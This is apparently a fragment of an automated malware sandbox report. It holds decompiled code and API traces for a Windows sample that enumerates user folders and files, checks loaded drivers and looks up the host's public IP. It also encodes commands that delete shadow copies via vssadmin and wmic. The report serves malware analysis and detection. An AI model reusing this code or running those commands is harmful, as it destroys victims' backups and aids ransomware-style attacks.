                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 137402220-1948191093
                                        • Opcode ID: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction ID: 1f5514a9c9bdc8d3f6e7b4d77255958fbdba67b62d9a96974f9b763613daa586
                                        • Opcode Fuzzy Hash: 925dd4ab4f661a2f1dd20785529a57f19e3c7354219da47122a0a74661947f21
                                        • Instruction Fuzzy Hash: F6219F75784309BBEB20CFA0DD4AFDE777DAB59B12F208504F701EA1C1C6B9A5609B60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                          • Part of subcall function 0F9D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0F9D6EAF
                                        • lstrlenW.KERNEL32(0F9DFF0C), ref: 0F9D6EBC
                                          • Part of subcall function 0F9D7EF0: InternetCloseHandle.WININET(?), ref: 0F9D7F03
                                          • Part of subcall function 0F9D7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F9D7F22
                                        • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6EEB
                                        • wsprintfW.USER32 ref: 0F9D6F03
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F9DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F9D6F19
                                        • InternetCloseHandle.WININET(?), ref: 0F9D6F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                        • String ID: GET$ipv4bot.whatismyipaddress.com
                                        • API String ID: 4289327240-2259699238
                                        • Opcode ID: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction ID: 5f71e2370dd9b9bb2034459d66c42b2ab8eff49ec4b75280de9756b4624c85b0
                                        • Opcode Fuzzy Hash: bc3419c3cbb132834af662a5fdd18d104b804bad7ffb749cb9add7b15c38bcea
                                        • Instruction Fuzzy Hash: 4B01F93174520437EB206A6A9D4EF9B3E2CEBC6B51F308020FA05E10C3DE685165C6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6C90 Relevance: 13.6, APIs: 9, Instructions: 109stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F9D6A40(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F9D6BE0(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F9D6950(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F9D6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}



















                                        0x0f9d6c9c
                                        0x0f9d6c9f
                                        0x0f9d6ca1
                                        0x0f9d6ca8
                                        0x0f9d6dd6
                                        0x0f9d6dd6
                                        0x0f9d6ddc
                                        0x0f9d6cbd
                                        0x0f9d6cbd
                                        0x0f9d6cd5
                                        0x0f9d6cd8
                                        0x0f9d6cdb
                                        0x0f9d6ce5
                                        0x0f9d6ceb
                                        0x0f9d6ced
                                        0x0f9d6cf0
                                        0x0f9d6cf6
                                        0x0f9d6d04
                                        0x0f9d6d10
                                        0x0f9d6d1c
                                        0x0f9d6d22
                                        0x0f9d6d24
                                        0x0f9d6d36
                                        0x0f9d6d3c
                                        0x0f9d6d3e
                                        0x0f9d6d48
                                        0x0f9d6d4a
                                        0x0f9d6d51
                                        0x0f9d6d82
                                        0x0f9d6d85
                                        0x0f9d6d8a
                                        0x0f9d6d8d
                                        0x0f9d6d8f
                                        0x0f9d6d92
                                        0x0f9d6d95
                                        0x0f9d6d97
                                        0x0f9d6da0
                                        0x0f9d6da0
                                        0x0f9d6da3
                                        0x0f9d6da3
                                        0x0f9d6d99
                                        0x0f9d6d9c
                                        0x0f9d6d9e
                                        0x00000000
                                        0x00000000
                                        0x0f9d6d9e
                                        0x0f9d6d97
                                        0x0f9d6d53
                                        0x0f9d6d67
                                        0x0f9d6d6c
                                        0x0f9d6d6c
                                        0x0f9d6dae
                                        0x0f9d6dae
                                        0x0f9d6db0
                                        0x0f9d6db0
                                        0x0f9d6d3e
                                        0x0f9d6dbd
                                        0x0f9d6dc3
                                        0x0f9d6dc3
                                        0x0f9d6dce
                                        0x00000000
                                        0x0f9d6cf8
                                        0x0f9d6d03
                                        0x0f9d6d03
                                        0x0f9d6cf6

                                        APIs
                                          • Part of subcall function 0F9D6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                          • Part of subcall function 0F9D6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                          • Part of subcall function 0F9D6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                          • Part of subcall function 0F9D6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                          • Part of subcall function 0F9D6A40: lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                          • Part of subcall function 0F9D6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                          • Part of subcall function 0F9D6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                          • Part of subcall function 0F9D6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                          • Part of subcall function 0F9D6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                          • Part of subcall function 0F9D6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                          • Part of subcall function 0F9D6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                          • Part of subcall function 0F9D6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                          • Part of subcall function 0F9D6BE0: wsprintfW.USER32 ref: 0F9D6C03
                                          • Part of subcall function 0F9D6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                          • Part of subcall function 0F9D6BE0: GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                          • Part of subcall function 0F9D6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                        • String ID:
                                        • API String ID: 1112924665-0
                                        • Opcode ID: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction ID: 32feab062f61293210968fe358081b6120d426da6fd40f9b3eb50eeadd85a6f7
                                        • Opcode Fuzzy Hash: 21bb9a38667d55b31847fe4c1c9b96aaa72c54062c853babb55d41140767d44b
                                        • Instruction Fuzzy Hash: A131D531A04219ABDF10AF64EC84AAD77BCEF85310F24C1A6F905E7183DB34AA54DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2F50 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0F9D2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}














                                        0x0f9d2f5a
                                        0x0f9d2f69
                                        0x0f9d2f6d
                                        0x0f9d2f74
                                        0x0f9d2f76
                                        0x0f9d2f7b
                                        0x0f9d2f8d
                                        0x0f9d2f93
                                        0x0f9d2f97
                                        0x0f9d2fa3
                                        0x0f9d2fa4
                                        0x0f9d2fa7
                                        0x0f9d2fac
                                        0x0f9d2ff2
                                        0x0f9d2ffa
                                        0x0f9d3008
                                        0x0f9d2fae
                                        0x0f9d2fb1
                                        0x0f9d2fb3
                                        0x0f9d2fb8
                                        0x00000000
                                        0x0f9d2fc0
                                        0x0f9d2fc0
                                        0x0f9d2fc5
                                        0x0f9d2fcf
                                        0x0f9d2fd7
                                        0x00000000
                                        0x00000000
                                        0x0f9d2fed
                                        0x0f9d2ff0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2ff0
                                        0x0f9d3011
                                        0x0f9d3022
                                        0x0f9d3022
                                        0x0f9d2fb8
                                        0x0f9d2f99
                                        0x0f9d2f9e
                                        0x0f9d2f9e
                                        0x0f9d2f81
                                        0x0f9d2f81
                                        0x0f9d2f81
                                        0x00000000

                                        APIs
                                        • EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0F9D2F74
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F9D2F8D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDeviceDriversEnumVirtual
                                        • String ID:
                                        • API String ID: 4140748134-0
                                        • Opcode ID: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction ID: 4c7de329cb28a127589ff01d55f5ce91161f909f0c02abca8b437967b4d48f0d
                                        • Opcode Fuzzy Hash: 750eeed36a9270dc3ab65c9c99cab56b1db04c9c59c0ca0919d7f30fd2ca12f0
                                        • Instruction Fuzzy Hash: 73212932A04219BBEB208F9CDD81FEDB7BCEB44711F2041A6FE04D6181D774A9259BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7CE0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 225 f9d7ce0-f9d7ecb InternetOpenW 226 f9d7ecd-f9d7edf InternetOpenW 225->226 227 f9d7ee2-f9d7ee8 225->227 226->227
                                        C-Code - Quality: 100%
                                        			E0F9D7CE0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}




























































                                        0x0f9d7cf8
                                        0x0f9d7d04
                                        0x0f9d7d0f
                                        0x0f9d7d19
                                        0x0f9d7d23
                                        0x0f9d7d2d
                                        0x0f9d7d37
                                        0x0f9d7d41
                                        0x0f9d7d4b
                                        0x0f9d7d55
                                        0x0f9d7d5f
                                        0x0f9d7d69
                                        0x0f9d7d73
                                        0x0f9d7d7d
                                        0x0f9d7d87
                                        0x0f9d7d91
                                        0x0f9d7d9b
                                        0x0f9d7da5
                                        0x0f9d7daf
                                        0x0f9d7db9
                                        0x0f9d7dc3
                                        0x0f9d7dcd
                                        0x0f9d7dd7
                                        0x0f9d7de1
                                        0x0f9d7deb
                                        0x0f9d7df2
                                        0x0f9d7df9
                                        0x0f9d7e00
                                        0x0f9d7e07
                                        0x0f9d7e0e
                                        0x0f9d7e15
                                        0x0f9d7e1c
                                        0x0f9d7e23
                                        0x0f9d7e2a
                                        0x0f9d7e31
                                        0x0f9d7e38
                                        0x0f9d7e3f
                                        0x0f9d7e46
                                        0x0f9d7e4d
                                        0x0f9d7e54
                                        0x0f9d7e5b
                                        0x0f9d7e62
                                        0x0f9d7e69
                                        0x0f9d7e70
                                        0x0f9d7e77
                                        0x0f9d7e7e
                                        0x0f9d7e85
                                        0x0f9d7e8c
                                        0x0f9d7e93
                                        0x0f9d7e9a
                                        0x0f9d7ea1
                                        0x0f9d7ea8
                                        0x0f9d7eaf
                                        0x0f9d7eb6
                                        0x0f9d7ebd
                                        0x0f9d7ec4
                                        0x0f9d7ec6
                                        0x0f9d7ecb
                                        0x0f9d7edd
                                        0x0f9d7edf
                                        0x00000000
                                        0x0f9d7edf
                                        0x0f9d7ee8

                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F9D7EC4
                                        • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F9D7EDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                        • API String ID: 2038078732-2805935662
                                        • Opcode ID: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction ID: 2e06515f8ee9b72de9484f46fa45d8b61185205893f60446f9b794fd3d471f0b
                                        • Opcode Fuzzy Hash: 6aa26727da79f6f5d82752cbb9012afbb8eaa4e3a6815437072f4eb8faad332b
                                        • Instruction Fuzzy Hash: 7E41A8B4811358DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D43E0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99memorystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 97%
                                        			E0F9D43E0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F9D3B20(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}



















































                                        0x0f9d43f6
                                        0x0f9d4492
                                        0x0f9d449c
                                        0x0f9d44a4
                                        0x0f9d44ac
                                        0x0f9d44b0
                                        0x0f9d44b8
                                        0x0f9d44bc
                                        0x0f9d44c4
                                        0x0f9d44c9
                                        0x0f9d44d1
                                        0x0f9d44d9
                                        0x0f9d44e1
                                        0x0f9d44e9
                                        0x0f9d44f1
                                        0x0f9d44f9
                                        0x0f9d4504
                                        0x0f9d450f
                                        0x0f9d451a
                                        0x0f9d4525
                                        0x0f9d4530
                                        0x0f9d453b
                                        0x0f9d4546
                                        0x0f9d4551
                                        0x0f9d455c
                                        0x0f9d4567
                                        0x0f9d4572
                                        0x0f9d457d
                                        0x0f9d43fc
                                        0x0f9d43fe
                                        0x0f9d4406
                                        0x0f9d440e
                                        0x0f9d4412
                                        0x0f9d441a
                                        0x0f9d441e
                                        0x0f9d4426
                                        0x0f9d442e
                                        0x0f9d4436
                                        0x0f9d443e
                                        0x0f9d4443
                                        0x0f9d444b
                                        0x0f9d4453
                                        0x0f9d445b
                                        0x0f9d4463
                                        0x0f9d446b
                                        0x0f9d4473
                                        0x0f9d447b
                                        0x0f9d4483
                                        0x0f9d4483
                                        0x0f9d4596
                                        0x0f9d45a5
                                        0x0f9d45a9
                                        0x0f9d45b5
                                        0x0f9d45bd
                                        0x0f9d45d3
                                        0x0f9d45db
                                        0x0f9d45dd
                                        0x0f9d45ab
                                        0x0f9d45ab
                                        0x0f9d45ab
                                        0x0f9d45e7
                                        0x0f9d45f5

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
